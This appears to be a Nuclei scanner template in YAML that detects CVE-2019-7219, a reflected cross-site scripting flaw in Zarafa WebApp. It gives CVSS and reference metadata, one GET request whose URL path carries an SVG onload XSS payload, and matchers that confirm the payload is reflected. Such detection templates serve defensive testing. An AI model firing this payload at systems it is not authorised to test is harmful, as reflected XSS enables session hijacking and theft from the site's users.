50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: CVE-2019-7219
|
|
|
|
info:
|
|
name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
|
|
author: pdteam
|
|
severity: medium
|
|
description: |
|
|
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
|
|
reference:
|
|
- https://github.com/verifysecurity/CVE-2019-7219
|
|
- https://stash.kopano.io/repos?visibility=public
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-7219
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00113
|
|
epss-percentile: 0.44533
|
|
cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zarafa
|
|
product: webaccess
|
|
tags: cve,cve2019,zarafa,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<svg/onload=alert(/xss/)>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022037d9ddc6fc0ce33087413e64c147f74f5616135651355992d575e40a290d91a102210099222dbf1147758dd4c1a508d6d08cfd8c4404e9eec77829a7fa44e8cb981a80:922c64590222798bb761d5b6d8e72950 |